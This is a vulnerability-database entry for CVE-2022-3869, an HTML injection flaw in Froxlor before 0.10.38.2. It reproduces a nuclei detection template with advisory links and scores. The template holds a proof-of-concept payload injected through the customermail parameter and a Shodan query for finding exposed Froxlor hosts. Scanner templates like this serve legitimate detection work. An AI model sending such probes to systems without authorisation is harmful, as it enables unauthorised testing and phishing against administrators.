
Froxlor < 0.10.38.2. - HTML Injection

04 Jul 2026 03:00:48 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Froxlor < 0.10.38.2. - HTML Injection. HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2

Related

Reporter | Title | Published | Family
Huntr | Html Injection Reflected in Login Page | 4 Nov 2022 10:30 | huntr
Circl | CVE-2022-3869 | 6 Nov 2022 06:07 | circl
CNNVD | Froxlor cross-site scripting vulnerability | 5 Nov 2022 00:00 | cnnvd
CVE | CVE-2022-3869 | 5 Nov 2022 00:00 | cve
Cvelist | CVE-2022-3869 Code Injection in froxlor/froxlor | 5 Nov 2022 00:00 | cvelist
Github Security Blog | Froxlor vulnerable to code injection | 5 Nov 2022 19:00 | github
NVD | CVE-2022-3869 | 5 Nov 2022 14:15 | nvd
OSV | CVE-2022-3869 Code Injection in froxlor/froxlor | 5 Nov 2022 00:00 | osv
OSV | GHSA-6RJV-XXGR-V57X Froxlor vulnerable to code injection | 5 Nov 2022 19:00 | osv
Prion | Code injection | 5 Nov 2022 14:15 | prion

id: CVE-2022-3869

info:
  name: Froxlor < 0.10.38.2. - HTML Injection
  author: ctflearner
  severity: medium
  description: |
    HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.
  impact: |
    Attackers can inject arbitrary HTML content through the customermail parameter, potentially displaying fake content to users and facilitating phishing attacks against Froxlor administrators.
  remediation: |
    Update Froxlor to version 0.10.38.2 or later that properly sanitizes the customermail parameter and encodes HTML output.
  reference:
    - https://huntr.com/bounties/7de20f21-4a9b-445d-ae2b-15ade648900b
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3869
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3869
    cwe-id: CWE-79
    epss-score: 0.01265
    epss-percentile: 0.66169
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Froxlor"
    product: froxlor
  tags: cve2022,cve,froxlor,html,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'The message to ""><h2>TEST</h2>" failed'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b5d8df02c76601b97dff4e29eb8f1c2d17a011d2a3e2417d95cd4b1161c9c6a102202c640a318dde7c22483fadaab524b33cf2e86d2709ccb2d62d1b5cb4f2696e04:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (Current)
Vulners AI Score: 6.6 (Medium risk)
CVSS 3.1: 6.1
CVSS 3: 6.5
EPSS: 0.01265